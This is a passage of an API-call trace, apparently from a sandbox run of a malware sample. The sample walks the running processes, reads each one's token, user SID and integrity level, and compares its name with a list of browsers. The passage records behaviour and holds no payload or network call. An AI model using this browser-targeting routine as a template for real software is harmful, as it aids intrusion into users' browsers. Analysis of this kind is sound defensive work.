SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.211] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0243.211] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0243.211] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0243.211] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0243.211] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0243.211] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0243.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0243.211] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.211] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.211] GetLastError () returned 0x7a [0243.211] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.211] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.211] CloseHandle (hObject=0x340) returned 1 [0243.211] CloseHandle (hObject=0x548) returned 1 [0243.211] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.211] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.212] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.212] GetLastError () returned 0x7a [0243.212] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.212] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.212] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.212] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0243.212] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0243.212] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0243.212] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0243.212] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0243.212] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0243.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0243.212] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.212] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.212] GetLastError () returned 0x7a [0243.212] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.212] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.212] CloseHandle (hObject=0x340) returned 1 [0243.212] CloseHandle (hObject=0x548) returned 1 [0243.212] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.212] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.213] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.213] GetLastError () returned 0x7a [0243.213] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.213] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.213] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.213] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0243.213] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0243.213] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0243.213] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0243.213] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0243.213] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0243.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0243.213] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.213] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.213] GetLastError () returned 0x7a [0243.213] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.213] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.213] CloseHandle (hObject=0x340) returned 1 [0243.213] CloseHandle (hObject=0x548) returned 1 [0243.213] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.213] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.214] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.214] GetLastError () returned 0x7a [0243.214] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.214] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.214] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.214] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.214] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0243.214] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.214] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.214] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.214] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0243.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0243.214] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.214] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.214] GetLastError () returned 0x7a [0243.214] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.214] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.214] CloseHandle (hObject=0x340) returned 1 [0243.214] CloseHandle (hObject=0x548) returned 1 [0243.214] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.214] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.215] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.215] GetLastError () returned 0x7a [0243.215] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.215] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.215] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.215] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0243.215] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0243.215] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0243.215] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0243.215] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0243.215] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0243.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0243.215] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.215] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.215] GetLastError () returned 0x7a [0243.215] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.215] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.215] CloseHandle (hObject=0x340) returned 1 [0243.215] CloseHandle (hObject=0x548) returned 1 [0243.215] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.216] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.216] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.216] GetLastError () returned 0x7a [0243.216] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.216] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.216] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.216] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0243.216] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0243.216] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.216] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.216] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.216] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0243.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0243.216] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.216] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.216] GetLastError () returned 0x7a [0243.216] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.216] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.216] CloseHandle (hObject=0x340) returned 1 [0243.216] CloseHandle (hObject=0x548) returned 1 [0243.216] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.217] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.217] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.217] GetLastError () returned 0x7a [0243.217] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.217] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.217] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.217] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0243.217] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0243.217] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0243.217] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0243.217] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0243.217] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0243.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0243.217] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.217] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.217] GetLastError () returned 0x7a [0243.217] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.218] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.218] CloseHandle (hObject=0x340) returned 1 [0243.218] CloseHandle (hObject=0x548) returned 1 [0243.218] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.218] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.218] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.218] GetLastError () returned 0x7a [0243.218] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.218] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.218] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.218] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0243.218] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0243.218] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0243.218] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0243.218] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0243.218] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0243.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x548 [0243.218] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.218] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.218] GetLastError () returned 0x7a [0243.218] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.219] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.219] CloseHandle (hObject=0x340) returned 1 [0243.219] CloseHandle (hObject=0x548) returned 1 [0243.219] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.219] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.219] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.219] GetLastError () returned 0x7a [0243.219] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.219] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.219] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.219] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0243.219] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0243.219] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0243.219] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0243.219] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0243.219] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0243.219] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0243.220] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0245.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbc68) returned 0xc0000004 [0245.235] VirtualAlloc (lpAddress=0x0, dwSize=0xcc68, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0245.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcc68, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0245.236] OpenProcess 